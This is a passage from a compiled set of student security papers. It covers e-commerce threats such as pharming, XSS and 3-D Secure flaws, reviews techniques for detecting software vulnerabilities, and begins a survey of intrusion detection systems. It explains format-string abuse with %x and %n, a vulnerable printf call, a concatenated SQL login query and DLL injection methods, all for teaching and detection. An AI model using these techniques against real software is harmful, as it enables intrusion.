rogue network are fooled to believe that they are in legitimate network and thus believe that their transaction are secure; in actual 248 fact the integrity of their data has been compromised as the information are routed to the illegitimate network. The setup of the bogus network is relatively simple and undetectable; phisher could setup an evil twin wireless network using a laptop and could easily shutdown the network when he feel that his identity is compromised. Pharming It is very much similar to phishing; both uses bogus website and attempt to steal personal information from their victims. The main difference between these methods is that while majority of phishing scams could be detected when one pays close attention to discrepancies in web address whereas pharming is able to redirect legitimate web traffic to an illegitimate site regardless of whether the user input the correct address. Thus, pharming is a lot harder to detect than phishing. This redirection of web traffic could be achieved by means of Trojans, worms or viruses that are capable of attacking the address bar of web browser such that valid addresses to legitimate website are modified to illegitimate ones. Another method of redirection of web traffic would be DNS poisoning. This attack takes advantage of the fact that DNS has no means to validate the integrity of data received and that data in DNS are cached to achieve optimization. The hacker then corrupts the DNS server by introducing incorrect entries; these entries spoof legitimate address of entries in the DNS server and redirects them to a server he controls. As a result, web request to legitimate website are redirected to bogus website set up by the hacker. Cross-site scripting Cross-Site Scripting (XSS) is an attack techniques targeting web browser on the client-side; XSS attack exploits the vulnerability of web applications, which allow attacker to inject client-side scripts into users' web browser. These scripts, when injected and ran on the client browser, are able to carry out malicious act; recording of keystrokes, stealing of history, accessing session cookies and many others. XSS attacks could be categories under two main categories namely, Persistent and Non-persistent. Non-persistent A non-persistent XSS attack begins with the hacker attempt to identify a flaw in a trusted website that is susceptible to XSS attack. Once an attack vector has been identified, the hacker then begins scripting an attack to exploit the vulnerability of the vector identified. The completed scripts are inserted into a specially crafted link. This seemingly harmless link contains a URL mapping which points to the trusted website and also the malicious script that will run on the client browser when clicked. The hacker then begin spreading the link he had crafted through websites, forum and email spams. Due to the fact that the crafted link points to the trusted website, it is likely to deceive even the more experienced user to access the link with no knowledge that an attack is taking place. Fortunately, non-persistent XSS attack could be avoided easily; a general rule of thumb for user for user accessing sensitive information on the web would be to avoid clicking on unsolicited links and only access trusted web pages through well-formed URL entered by the user. Persistent 249 Unlike a non-persistent XSS attack, a persistent XSS attack does no require the creation of a crafted URL to carry out the attack. In the case of a persistent XSS attack, the hacker would first begin by creating a exploit code could be created using Javascript or any other scripting language. After which, the attack code is submitted to web sites where the code could be stored for an extended period time and accessed by many visitors; common area where attack codes could be submitted are forums, wikis, blog comments, user reviews and many other locations [7].When users access the "infected" pages containing the exploit code, the code executes itself automatically; giving the user no chance to defend against the attack. A persistent XSS attack is dangerous and hard to defend against. Firstly, because hackers are able to carry out the attack stealthily; take for example, the content within the <script> tag does not display itself in the webpage and thus it is difficult for user to detect whether a particular page is "infected". Secondly, the fact that exploit code are stored in the server would mean that it could exist indefinitely until it is removed, thus, it has a greater chance of infecting user. The situation is worsen by the fact that website with high traffic yield are usually targeted in persistent XSS attack, thus, it is able to infect many users in a relatively short amount of time. 4 Analysis on current system SET Protocol Despite the undisputed recognition of SET’s importance in ecommerce security, there are, however, still defects in the current protocol. Firstly, SET protocol does not specify how to preserve or destroy the data after every transaction, or determine where the data should be saved. As a result, it may become a vulnerability that a hacker can simply attack. Besides that, it also does not solve the dispute between the involving parties, namely cardholder, merchant, issuer, acquirer, payment gateway and center of the certification. Hence, whenever there is a dispute, SET does not have any rule to help or solve the situation. The problem is further highlighted with the lack of time information in the current protocol as it does not record the time while the transactions are being processed. This particular information can be useful whenever there are disputes as it can provide legal evidences. Last but not least, there is also the concern of using a weak 56 bit DES due to the computational cost of asymmetric encryption (IBM, 1998). Hence, there have been several suggestions which can help to improve the current protocol. First and foremost, a data destruction mechanism can be included into the current protocol such that it will help to ensure sensitive data are destroyed after the transaction, and will only save a copy in the storage server for further reference. It will help to make sure that those data cannot be found in the computers of involving party, but only accessible through the storage server. In addition, this specific mechanism can also be used to record other useful information such as the transaction time which may be useful to different parties as mentioned above. (The Improvement of SET Protocol based on Security Mobile Payment, 2011) PIN/TAN System The PIN/TAN system is an authentication scheme which has been widely used in the e-commerce world nowadays, especially when it comes to internet 250 banking. Some banks have even taken a step further by providing a TAN generator token for the users, which can reduce the risk of compromising the entire TAN list. However, this does not solve the problem that unfortunately, the PIN/TAN system is inherently insecure as brought out by several students from a university in Germany (Outflanking and securely using the PIN/TAN system). It has been proven that one does not need to have any special hacker skills, but only need just some experience with online banking and some basic programming knowledge to perform the attack. Basically, the attack require the attacker to infect the target’s system with a computer virus or a Trojan containing a spy that lurks hidden in the background and eavesdrops on the computer’s hardware input (keyboard and mouse) to obtain the required information, which are the account number, the PIN and finally the TAN. Once all these sensitive data have been acquired, the spy closes the web browser before the TAN is sent to the bank server to ensure that the TAN stays valid and finally, the attacker can just use all the stolen information to transfer money from the target’s account. This attack is made possible for several reasons. One of them is due to the fact that those sensitive data are typed in clear text into the computer which has allowed the attacker to acquire valid authentication data by just stealing the target’s input. Besides of that, the PIN/TAN system is not immune to common internet threat such as phishing. 3-D Secure 3-D Secure is designed as an extra layer of security for online transaction involving debit and credit card. Despite all the better security claims made by Visa, the developer of the protocol, it has several well-known flaws which has caused it to come under attack in numerous occasions. Nevertheless, it’s probably the largest single sign-on system ever deployed. Its first and maybe the most fatal weakness is none other than the 3DS form, which is an iframe of pop-up without an address bar. In this case, a customer is not able to verify where the form has come from. This is going against the advice given to the public on how to prevent phishing attacks and also makes attack against 3DS easier (eg. Man-in-the-middle attack). Its second weakness is the activation during shopping (ADS) mechanism in which customers are requested to fill in an ADS form to verify that he is the authorized cardholder. As a result of this, it is easy for an attacker to impersonate the ADS form and request all those sensitive data from the customer while from the customer’s perspective, it is merely an online shopping website asking for personal details. Besides that, there is also a mechanism which helps the customer to verify that he’s talking to the actual bank by displaying a certain phrase he has chosen during the ADS process. However, this specific mechanism has allowed 3DS to be even more vulnerable to a MITM attack. (Verified by Visa and MasterCard SecureCode: or, How Not to Design Authentication) 5 Different Ways to Pay Online Disposable Credit Cards Disposable credit card has been around for quite some time but many are still unaware of its existence. American Express was the first bank to introduce it in September 2000 [8]. Subsequently, many other banks also offer disposable credit card, yet it is not widely known or utilized since it's adoption. These disposable credits cards could be applied from any banks that offers them and 251 customer could apply for a number of these cards under one credit card account. These disposable cards could then be for different merchants for the e-transaction. The main idea behind the use of disposable credit card is that these cards functions as aliases to your original credit card; such that in the event that one of the disposable credit card are compromised, the hacker would not have any knowledge of your original card number. Disposable credit seems to be a plausible choice to secure etransaction but yet it is not widely used. One of the reason could be due to administrative procedures involved in maintain these cards; there is a need to renew the cards on an annual basis and when we take into consideration that a user could own a number of these cards, the trouble involved in maintaining the cards offsets the benefits it provides. Prepaid Credit Cards A prepaid credit card is similar to any other prepaid card; allowing user to make purchases using pre-loaded sum of money in the card. There are two different forms of prepaid credit card: a "reloadable" and "non-reloadable" card, the former allow user to add additional funds to the balance of the card while the latter does not allow. These prepaid credit cards could be purchased without a bank account or credit card and user are able to make purchases using the value stored in the card, which functions the same way as an actual credit card (except the fact that it does not provide purchases on credit). This method of payment minimizes the loss incurred by the user in the event that the card number has been compromised. Furthermore, Visa's zero-liability policy, which protects user from unauthorized charges on their cards, are also applicable to prepaid cards. An interesting point to note would be the underlying cost associated with the use of these card which includes the cost of adding value to the card (reloadable cards) and the cost of the card itself(non-reloadable cards) [9]. MasterCard SecureCode SecureCode is a service provided by MasterCard to improve on e-transaction security; it seeks to protect against the unauthorized use of credit cards on participating online retailers [10]. All MasterCard holders could register their existing credit or debit card for this service and receive their SecureCode upon completion. When a user confirms his purchase on an e-commerce site that offers this service, the user is prompted to input his SecureCode; this SecureCode is unique to the user and it serves to verify the user identity and before allowing the transaction to take place. An additional feature SecureCode provide is to act as a medium between the customer and retailer, meaning that customer credit card number is not revealed to the merchant during the transaction. However, SecureCode has its limitation; it is only applicable to participating online retailers who have opted to implement SecureCode on their transaction system. Thus, users choices are limited by the list of participating merchants and the coverage of this service would remain limited unless more retailer decide to implement SecureCode. Online Payment Services Online payment services such as Google Checkout(checkout.google.com) and Amazon Payments(payments.amazon.com) are simply web services that handles transaction between customer and online retailer. One might argue on the necessity of having these middleman websites to handle 252 transaction when it could already be done on the retailer website. It is true to some extent that this site does indeed seemed to just handle transaction, but we must also take note of the underlying security features these site offers that could better protect our credit card information. When users sign up for any one of these payment services, the users must first have a certain level of trust on the reliability of the web service in securing his data. By entrusting the sites with personal information, the users leverage on the expertise and security technologies implemented on these sites to carry out secure transaction, or to put it in another way: we could also say that there is a shift in security responsibility from the users to the payment website. Transaction carried out using payment website are safer in the sense that user credit card information are not exposed to the merchants during the payment process, thus the confidentiality of the credit card numbers are preserved. However, we must also be aware that by using these websites, we are making the assumption that the owners of the services are protecting our personal information to the best of their ability, which might not be the case. 6 Conclusion Electronic transaction has already become an integral part of the commerce system nowadays. Banking institutions and companies worldwide have jumped onto the wagon in hope of reaping huge financial benefits from the current systems. As a result, the security of such systems has become more of a concern to the different parties involved. However, we observed that there is no existing system which can be considered fully secure. All these systems and protocols have their own strengths and weaknesses. In fact, there are many companies have been taking proactive efforts to develop better and more secure systems. Therefore, improved systems and protocols are expected to be developed and used in the future. 253 7 References 1. Atul Kahate: Security and Threat models – Secure Electronic Transaction Protocol (2008) http://www.indicthreads.com/1496/security-and-threat-models-secure-electronictransaction-set-protocol/ 2. 3-D Secure http://www.web-merchant.co.uk/optimal%20technical%20data/3D_secure_Guide.pdf 3. SQL Injection http://dev.mysql.com/tech-resources/articles/guide-to-php-security-ch3.pdf 4. Common Security Vulnerabilities in E-Commerce System http://www.symantec.com/connect/articles/common-security-vulnerabilities-ecommerce-systems 5. British Broadcasting Corporation (BBC): Phishing con hijacks browser bar (2004). http://news.bbc.co.uk/2/hi/technology/3608943.stm 6. Raskin, A.: Tabnabbing: A New Type of Phishing Attack (2010), http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ 7. Fogie, S., Grossman, J., Hansen, R., Rager, A., & Petkov, P.: XSS Attacks (2007). pp. 75, http://books.google.com/books?id=dPhqDe0WHZ8C&hl=en 8. Linsey, R.: Disposable Credit Card Numbers (2001). http://www.cardratings.com/feb01new.html 9. White, M.C.: Credit Cards for Kids? Don’t Be Childish (2011). http://moneyland.time.com/2011/10/25/why-parentsshouldnt-give-their-kids-a-credit-card/ 10. MasterCard: Support SecureCode™ FAQs. http://www.mastercard.us/support/securecode.html 11. Secure Electronic Transactions (SET). http://searchfinancialsecurity.techtarget.com/definition/SecureElectronic-Transaction 12. Electronic Transaction. http://netlab.cs.iitm.ernet.in/cs648/2009/assignment1/rajan.pdf 254 13. Ganesh Ramakrishnan: Secure Electronic Transaction (SET) Protocol http://www.isaca.org/Journal/Past-Issues/2000/Volume-6/Pages/Secure-ElectronicTransaction-SET-Protocol.aspx 14. 3-D Secure http://www.3dtrust.com/ 15. 3-D Secure Integration http://www.advansys.com/default.asp/p=87/3D_Secure 16. Secure Online Banking http://www.nationwide.com/secure-online-banking.jsp 17. Buffer Overflow http://searchsecurity.techtarget.com/definition/buffer-overflow 18. The improvement of SET Protocol based on Security Mobile Payment http://www.aicit.org/jcit/ppl/03_10.4156jcit.vol6.issue7.3.pdf 19. Analysis of SET and 3-D Secure http://www.58bits.com/thesis/3-D_Secure.html#_Toc290908626 20. SET Criticism http://www.wolrath.com/set.html#3.4.1_Delays,%20_delays,_delays_! 21. Improving the Secure Electronic Transaction Protocol by Using Signcryption http://www.signcryption.org/publications/pdffiles/HanaokaZhengImai-e84a_8_2042.pdf 22. Secure Electronic Transactions: An Overview http://www.davidreilly.com/topics/electronic_commerce/essays/secure_electronic_tra nsactions.html 255 256 A Review of the Techniques Used in Detecting Software Vulnerabilities Nicholas Kor, Cheng Du National University of Singapore Abstract. This paper reviews a few common methods of detecting software vulnerabilities and their use in detecting the presence of some of the more prevalent vulnerabilities. We also survey methods used to mitigate the amount of damage that can be done by a program. 1 Introduction Vulnerabilities present in the design of programs allow attackers to reduce the integrity, assurance and availability of the program through exploitation. By careful analysis of the program code for vulnerabilities, the likelihood of the successful malicious exploitation of the program will be greatly reduced. This goes on to result in a more secure and stable program as well as maintaining the health of the rest of the system that interacts with it. In this paper we outline common methods of testing programs for vulnerabilities and their use in detecting the presence of a few of the more common vulnerabilities present in software. We also go on to review methods used to prevent compromised programs from damaging the systems they reside in. 257 2 2.1 Detecting Vulnerabilities in Software Code Review Code review at its simplest is an examination of the code by the author or someone else to find faults, both security related bugs and non-security related bugs, in the code and repair them. There are a few types of code reviews with varying levels of formality and manpower involved, describing the different types are outside the scope of this paper. Static code analysers, which have a section of their own in this paper, are also often used in large projects to aid in the checking of known vulnerabilities. While checking that the code does what it is supposed to do is pretty obvious and routine, checking that the code only does what it is supposed to and nothing more is less so. The additional “and nothing more” requirement ensures that the code is 1 checked for functionality and security . Evidence suggests that code review can be more effective than dynamic testing, which is the testing of software through execution of test data. For example, a software engineering researcher, Jones2 summarized the data in his large repository of project information to paint a picture of how reviews and inspections find faults relative to other discovery activities. Because products vary so wildly by size, the table below presents the fault discovery rates relative to the number of thousands of lines of code in the delivered product. The numbers below seem to indicate that code review outstrips all other forms of fault detection, in the number of faults found. Table1. Faults found during discovery activities. Discovery Activity Requirements review Design review Code inspection Integration testing Acceptance testing Faults found (Per thousand lines of code) 2.5 5.0 10.0 3.0 2.0 Of course, the effectiveness of code review in detecting vulnerabilities depends highly on the skills of the reviewer. Ideally, the reviewer should possess computer security expertise in addition to being a competent programmer and familiar with the source code. However, not all organisations have the luxury of recruiting people with the needed computer security skills and this may cause the security of the software to be neglected when the code is reviewed. 258 2.2 Using Automated Tools Automated tools can be used to aid the detection of software vulnerabilities. Static program analysers are able to detect bugs in code, such as the presence of memory leaks. Lint3 is a classic example of a static analyser used to detect errors in C source code. Some static analysers can provide analysis of the behaviour, typically the control-flow and data-flow, of the program and the translation of its behaviour to a representation that is can be easily understood by a reviewer. This function is especially valuable to a reviewer who is not part of or is new to the development team, with no prior knowledge of the code, as it helps him understand the code in a shorter amount of time. Other static analysers can also be configured with the express function of finding software vulnerabilities, such as detecting the use of unsafe and deprecated library functions. As with any man-made tool, static analysers are never perfect and even the better written ones produce false positives, wrongly reporting acceptable code as being vulnerable, and false negatives, failing to detect vulnerable code, from time to time, necessitating the need for the manual verification of the warnings given. Thus such automated tools should be used in conjunction with code reviews and code testing and never as a standalone. 2.3 Negative or Non-Functional Testing Testing of code is an integral part of the software development process. The code is usually subjected to different levels of testing, including unit testing where each module of the code is tested for functionality, integration testing, where the code is tested after integrating two or more of its component modules, and regression testing, where code is tested after a version change to ensure that the enhancement of the system or the fixing of bugs does not introduce new bugs. Negative testing4 however, involves verifying the stability of the program by checking the results of providing invalid or malformed data as input. Causing the program to crash or an unhandled exception could indicate the presence of vulnerabilities. The test data should also be fed in all of the ways the program accepts information, be it command line arguments, input boxes or even network packets. This is in line with the earlier concept of checking that the program only does what it should and nothing more. In later parts of this paper, we will present examples of how negative testing can be used to reveal the presence of some of the more common vulnerabilities in code. One specific type of negative testing is fuzz testing 5, where the test data is randomly generated. This saves time by automating the generation of test cases, but a 259 possible disadvantage of using this method of testing would be that rare boundary cases that do not arise during normal operation of the program may go undetected. To remedy this, special test cases targeting these boundary cases can be crafted to be used in conjunction with the random test inputs. 3 3.1 Common software vulnerabilities and security faults Buffer Overflows Buffer overflows are software faults that occur when the amount of data being written to a buffer is more that what the buffer can contain. The data overflows the buffer and overwrites the memory following the end of the buffer. When used as an attack vector, the area of memory following buffer to be overrun is usually determined by the attacker to have some special significance, for example, containing system code that he can overwrite or a return address which he can replace. The attacker then uses this vulnerability to inject his own code in to the memory area of interest, typically with the aim of running his chosen programs with higher privileges. The C programming language is particularly susceptible to buffer overflows as it does not bounds check buffers and because many of the functions provided by the standard C library unsafe, where the programmer needs to explicitly confirm that the size of the data being read is always smaller than the buffer it will be written to 6. Some of the unsafe library functions are the strcpy, strcat, gets and sprint functions 7,8. The detection techniques outlined in the previous sections can be applied to detect for the presence of buffer overflow vulnerabilities. For example, the use of these unsafe functions can be spotted during code review and the code can be rewritten to use safe versions of these functions, if available, or rewritten to use the functions in a safe manner. This process can also be automated through the use of static code analysers or other similar tools. Splint9, a tool for statically checking C programs for security vulnerabilities and coding mistakes, can be configured to detect if the unsafe library functions are used. Splint can also be used in conjunction with annotated pre and post-conditions in the source code to detect if the function calls are being used in a safe manner, if these functions absolutely have to be used. 3.2 Failing to handle invalid inputs The failure to or the improper handling of invalid inputs is a recipe for disaster. Here we outline two specific software vulnerabilities falling in this class of software faults, both of which stem from or can be exploited by not handling specially crafted user input. 260 3.2.1 Uncontrolled Format String Most programming languages include functions to format data for output. In most languages, the formatting information is described using some sort of a string, called the format string. The vulnerability arises when programmers use data from external untrusted sources directly as the format string10. As a result, attackers can enter format strings as input to the program, causing many problems. The C programming language is one of the languages that use formatting strings, in the printf family of functions, making it susceptible to this type of exploit. Take for example the statement, printf(string_from_untrusted_user); By using the format specifier “%x” in a format string that is input into the program, the attacker can inspect the program stack 4 bytes at a time. Another format specifier with a potentially dangerous function is “%n”. Using this particular format specifier, the attacker is able to write 4 bytes to the stack11. Thus using a combination of the two format specifiers, the attacker can insert his own code into the stack to be executed or replace a return address to point to some other code in the system. During code review, one could simply check for the misuse of the formatted output printing function. Static code analysers such as Splint, mentioned above, are also able to detect improper usage of the functions. Negative testing can also be used in black box situations where code is unavailable. Testers can simply pass potentially unsafe formatting specifiers such as the “%x” C vulnerability detailed above and check if hexadecimal values are returned. 3.2.2 SQL Injections Nowadays, it is common to find programs organize their data through SQL, a portable database library. This opens up a new way to exploit a program that does not properly validate user input. For example, a program may ask the user for authentication before displaying sensitive data. If the program uses SQL to check for user credentials but fails to validate the input, a successful SQL injection attack may allow the attacker to gain unauthorized access to the sensitive data. Suppose the program asks for the user’s name and password and saves it into the variables $name and $password, and concatenates information provided with a string literal to construct the following SQL statement to pass on to the SQL interpreter, “Select * from user where name=$name and password=$password”. This use of string concatenation allows the attacker to pass his own SQL queries to the system to be executed. With a little guesswork, the attacker will be able to access, modify and delete data on the database. When doing a code review portions of code that hold to the following pattern is vulnerable to SQL injection. The code, takes user input, does not validate the input, 261 uses the input directly to query the database and uses string concatenation to build the SQL query. Negative testing by supplying malformed inputs to the program also reveal if the program is vulnerable to such an exploit. Of course, all of this only applies to code that interfaces with a database, any program that does not will be obviously free of such vulnerabilities. 4 4.1 Other methods to ensure that programs do not damage the system Checking if the program is run with the lowest possible privileges Programs such as web servers or daemons should always be running under the lowest possible privilege levels. This will reduce the damage if the program has been compromised by malicious attacks. For example, the Apache HTTP Server can be configured such that it refuses to start if it detects it is being run with administrator privilege, because a restricted user privilege is sufficient for the server to perform its tasks. By ensuring a program implements such privilege check, it helps reduce the damage to the system, should an attack be successful. 4.2 Running the program in a sandbox Sandbox is a common mechanism of separating the program from the actually system. It is a specific example of virtualization. Its usage is widespread among all major antivirus software for detection of malicious programs. By running the program inside a sandbox, the resources the program uses is tightly controlled by the sandboxing software. Therefore, when the running program is compromised by attacks, the damage will not extend beyond the sandbox and can be easily identified for further analysis. A typical example of a sandbox for vulnerability testing is to launch the program inside virtual machine software like Oracle VirtualBox. It will closely monitor the system resources utilized, I/O pattern and network access and so on. With the statistics collected from the running program, the access pattern can be analyzed and any suspicious behaviour will be identified. 4.3 Checking If the System Uses Data Execution Prevention Many modern operating systems such as Microsoft Windows has a security feature called Data Execution Protection12, and it prevents the data section of a protected program from being executed. Because a typical buffer overflow attack always involves overwriting the data section of the victim program with malicious 262 instructions and tricking the victim program into jumping into these instructions, ensuring that the program under testing utilizes this technology greatly reduces the chance of a successful attack on the program. 4.4 Checking That Randomization the System Uses Address Space Layout Another security feature common to modern operating systems is Address Space Layout Randomization. It randomizes the address of system data structures and the position of system libraries in processes address space. This complicates remote code execution and as a result, a malicious attacker trying to inject code will have a hard time predicting the address of system library or accessing system data structures. Furthermore a wrong prediction of the address will almost always crash the attack process every time; therefore making it impossible for the attacker to try another address prediction. For example13, since Windows Vista introduced ASLR, many attack techniques that used to work well in Windows XP will only have a chance of 1 in 256 to work on the new system. Any trial on the other 255 wrong memory locations will crash the attacked process, preventing the attack from trying other possibilities as well as alerting users of the unusual crashing behaviour that might lead to the discovery of the attacker. 4.5 Ensuring That the Program Does Not Use Injected Compromised Code By Mistake A common technique to inject malicious code is through loading of unintended dynamic library. For example on Windows, a malicious program will inject a carefully crafted DLL (Dynamic-Link Library) into the address space of the victim process so that the attacking program will reside in the same address space. i.e. it has access to all the data structures and is able to perform arbitrary operations at the privilege level of the victim process. In an article14 written by Robert Kuster, the author describes 3 ways to inject foreign instructions into a target process in detail. Amongst the three methods, namely Windows Hook, CreateRemoteThread & LoadLibrary and CreateRemoteThread & WriteProcessMemory, two of them are achieved through the use a custom DLL. Therefore if a program does not check for suspicious loaded libraries during run-time, it could easily leak sensitive data to the attacker or run arbitrary injected code at its current process privilege and hence potentially damage the rest of the system. One way to prevent code injection through foreign libraries is to keep a whitelist of the names and hash of the authorized libraries the program intends to use. And in the event of a library being loaded, the program can check whether it is 263 authorized by looking up the whitelist so it can immediately unload the unauthorized library. 5 Conclusion The methods and techniques we have investigated are by no means exhaustive and the myriad of vulnerability detection and prevention techniques seem to be only limited by a reviewer’s time and patience. Thus we have only chosen the ones that we have decided to be the most relevant to this course. As more and more commercial code is written, new attack vectors are continuously being discovered and an equal number of mitigation techniques end up being proposed and developed. We also note that none of the techniques, indeed no single technique ever is, are by any means magic bullets capable of securing a program or system. A combination of vulnerability detection and mitigation should be always be used to secure systems and the programs running on them. 264 References 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. Pfleeger, S., and Hatton, L. "Investigating the Influence of Formal Methods." IEEE Computer, v30 n2, Feb 1997. Jones, T. Applied Software Measurement, McGraw-Hill, 1991. Johnson, S. Lint, a C program checker. Computer Science Technical Report 65, Bell Laboratories, December 1977. Beizer, Boris. Software Testing Techniques, van Nostrand Reinhold, 1990 B.P. Miller, D. Koski, C.P. Lee, V. Maganty, R. Murthy, A. Natarajan, and J. Steidl, "Fuzz Revisited: A Re-examination of the Reliability of UNIX Utilities and Services", Computer Sciences Technical Report #1268, University of WisconsinMadison, April 1995. ISO/IEC 9899 International Standard. Programming Languages – C. December 1999. Approved by ANSI May 2000. http://www.gnu.org/software/libc/manual/html_node/Copying-andConcatenation.html http://www.gnu.org/software/libc/manual/html_node/Formatted-OutputFunctions.html David Larochelle and David Evans. 2001. Statically detecting likely buffer overflow vulnerabilities. In Proceedings of the 10th conference on USENIX Security Symposium - Volume 10 (SSYM'01), Vol. 10. USENIX Association, Berkeley, CA, USA, 14-14. http://www.dwheeler.com/essays/write_it_secure_1.html http://www.gnu.org/software/libc/manual/html_node/Table-of-OutputConversions.html A detailed description of the Data Execution Prevention (DEP) feature in Windows XP Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows Server 2003 http://support.microsoft.com/kb/875352 http://netsecurity.about.com/od/quicktips/qt/whatisaslr.htm Three Ways to Inject Your Code http://www.codeproject.com/KB/threads/winspy.aspx 265 into Another Process 266 Intrusion and Prevention System Analysis Tran Dung – U096942M, Tran Cong Hoang – U096948 Abstract. Intrusion detection is the process of monitoring and analyzing a computer system or network for potential incidents, which include threat or violation of securities policies or practices. Nowadays when most networks are interconnected, attackers can easily exploits many system's vulnerabilities and make use of them to attack these systems. Detecting, recording and deterring these actions become more and more important, and therefore, Intrusion detection and prevention systems (IDPS) are becoming increasingly essential to any system' security suites.. In this research, we will discuss about several types of IDPS (e.g. components, capabilities). In the end, we will also survey a range of available intrusion detection systems, each from a different category, by carrying out several sample attacks on our systems, and analyze the results collected. 1 Introduction Intrusion detection and prevention system (IDPS) is software which is capable of monitoring a network or a machine to detect malicious activities and performing certain actions to stop possible incidents. Every IDPS has the following typical components: Sensor or Agent. The responsibility of this device is to monitor and optionally analyze activities. Management server. This device’s main responsibility is to perform analysis on received information from all Sensors or Agents, sometimes in a way that each individual Sensor or Agent cannot do. For example, it can detect correlation which is the relationship among event information from multiple Sensors or Agents (e.g. packets from the same IP source, etc.). Database server (usually optional). This device simply store information. Console. This program is an interface for IDPS’s administrators to perform admin works such as configuring Sensors/Agents, updating IDPS, etc. Currently, there are a lot of intrusion detection systems available, such as Snort, Kismet or Ossec. There are two main ways to categorize them: according to their detection methods (Signature-based detection, Anomaly-based Detection, Stateful Protocol Analysis), or according to the way they are deployed and the events they monitor: Network-based, Wireless, Network Behavior Analysis and Host-based. In the following parts, we will follow the latter way of categorizing to analyze current IDPS technology. Besides, we will also focus only on the Sensor/Agent component of each type of IDPS since it is the main feature that distinguishes different types of IDPS from each other. In addition, high-level descriptions of the capabilities of each type of IDPS will also be discussed. 267 2 2.1 Network-based IDPS Introduction Network-based is the type of IDPS that monitors and analyzes network activity on one or more network segments for suspicious activity. It is often deployed at boundaries between networks, (such as positions near border firewalls or border routers. 2.2 Sensors Each IDPS sensor monitors traffic on one or more network segments. They are deployed on network interface cards that are placed into promiscuous mode, which means that they will accept all incoming packets that they see on the network, regardless of the destination. Most IDPS use multiple, some even use hundreds of sensors. The sensors could belong to either one of two types: software only or appliance. The former means only a software solution is provided, while the latter means this sensor comprises hardware, software and even a specialized hardened OS. The appliance type is optimized for the sensor task, so it's much more capable than the software only solution. The sensors could be deployed in one of two modes: inline or passive mode. The inline mode means the sensor is deployed so that all traffic it monitors must pass through it, while the passive mode means the sensor only monitors on the copy of the traffic. The inline sensors are often placed directly on some special places in the network flow, at the division between networks (similar to firewalls), such as: border of connection between external and internal networks. The passive sensors are deployed with the usage of either spanning port or network tap. The spanning port is a special port of the switch where it can see all packet passing through the switch, so when the sensor is connected to this port, it can receives copies of traffic going through the switch and monitors them. The network tap is a special device which connects the sensor to the network, and it provides the sensor with a copy of packets going through the network. Passive sensors can also receive copied packets indirectly, which are sent from an IDS load balancer that aggregates packets copy and distributes them between passive sensors. 2.3 Security capabilities Detection capabilities. Traditionally, network-based IDPS uses signature-based detection for detecting threat. This method means the IDPS will compare the content of each item (network packet or log entry) against known threat patterns (mostly using simple comparison method) to identify possible threats. For example: an email containing an attachment file .exe could possibly carry a malware or virus. This method is effective at identifying known threats, but it has a major weakness which is to be very ineffective against unknown threats, or threats that make use of evading 268 techniques. The types of event which are common discovered by network-based IDPS include the following: Application layer attacks (e.g., banner grabbing, format string attacks, password guessing, malware transmission, etc). Several application protocols such as DHCP, HTTP, FTP, etc… can be analyzed. Transport layer attacks (e.g., port scans, unusual packet fragmentation, SYN floods, etc.). The most commonly analyzed transport layer protocols are TCP and UDP. Network layer attacks (e.g. spoofed IPs, illegal IP headers, etc.). The most commonly analyzed transport layer protocols are ICMP, IPv4 and IGMP. Some network-based solutions also support IPv6 protocols. Unexpected application services (e.g., tunneled protocols, backdoors, etc.). These threats can be detected using Stateful Protocol Analysis or Anomaly-based methods. Policy violations (e.g. blacklisted Web sites or application protocols, etc.) Even though network-based IDPS can discover a wide range of malicious activities, they do have a number of serious limitations. One of the most important one is that it has little understanding of many network protocols and cannot track the state of complex communications. For example, many IDPS using this method cannot pair a request with the corresponding response, or remember previous requests when processing the current request. This prevents signature-based detection methods from detecting attacks that comprise multiple events if each event does not clearly signal an attack. Since network-based IDPS often needs to monitor a huge amount of traffic, and because of the inherent problems with this detection method, this type of IDPS often generates many false positives, as well as false negative. Newer network-based IDPS use a combination of detection methods (Signature-based analysis, Stateful Protocol Analysis, etc.) to increase the accuracy of their detection, as well as reduce the number of false alerts and false positives. 3 3.1 Wireless IDPS Introduction According to figures published on the website of CTIA (The Wireless Association), as of June 2011, there are around 327.6 million wireless subscribers in the U.S alone. It is clear that Wireless technology has been revolutionizing the way we work and live. Wireless solutions such as Radio Frequency Identification (RFID) tags, for instance, are improving luggage operations at many airports, while everyone is able to send and receive emails from their mobile devices. As wireless technology has gained popularity, so have attacks against them. In fact, wireless networks are not only vulnerable to TCP/IP based attacks which are native to wired networks; they also suffer from a wide range of 802.11 specific threats. Unfortunately, traditional IDPS solutions are at times unable to detect or prevent attacks of the latter kind. The reason is that traditional IDPS concentrate more 269 on layer 3 and above threats. This implicit trust of layer 1 and layer 2 results from the fact that to get access to the cables or data points of a wired network, attackers must either defeat the physical security (e.g. guards, locks) or in various cases, be an employee. However, wireless technology brought about a new situation. To be precise, wireless networks are not only susceptible to all the same attacks at layer 3 and above but they are also vulnerable to a many threats at layer 1 and layer 2. This is unavoidable because the technology uses electromagnetic spectrum in the radio frequency range as the medium over which computers gain access to the network. In other words, layer 1 and layer 2 can be easily affected by anyone within the radio frequency range of the network and traditional IDPS usually does not monitor for these kinds of threats. For some time, WLAN had had very poor security on a wide open medium. However, as new improved encryption schemes were invented, traditional IDPS has also been improved to help tackle this problem. In the following parts, we will focus on the sensors of wireless IDPS and at then discuss the security capabilities of the technology. 3.2 Sensors The main components in a wireless IDPS are pretty much the same as a networkbased IDPS: consoles, sensors, management servers and database servers (optional). Other than the sensors, all of the components perform essentially the same roles for both kinds of IDPS. In a wireless IDPS, sensors have the same basic functionalities as network-based IDPS sensors. However, because of the complex nature of monitoring wireless communications, wireless sensors function quite differently. Unlike its network-based cousin which can monitor all packets on the network, a wireless IDPS works on samples of traffic. There are several frequency bands to monitor and each band is divided into many channels. Since it is not possible to monitor all packets on a band at the same time, a sensor must handle a single channel each time. As a matter of fact, the longer a sensor stays on a channel, the more likely it would miss malicious activity happening on the other channels. Typically, a sensor is configured to jump among channels very frequently such that it can monitor a channel a few times per second. In many systems, specialized sensors which have several radios and high-power antennas, with each pair of radio & antenna monitoring a different channel, are being used. Some IDPSs further coordinate scanning activities among its sensors with overlapping ranges so that each sensor doesn’t have to monitor too many channels. In general, there are 3 main types of wireless sensors: Dedicated. Dedicated sensors usually function passively in a radio frequency monitoring mode to sniff wireless traffic. Some dedicated sensors would perform analysis on their own while the other would simply forward the received packets to the management server. One important characteristic of dedicated sensors is that they do not pass packets from source to destination. Bundled with an Access Point (AP). Several manufacturers have 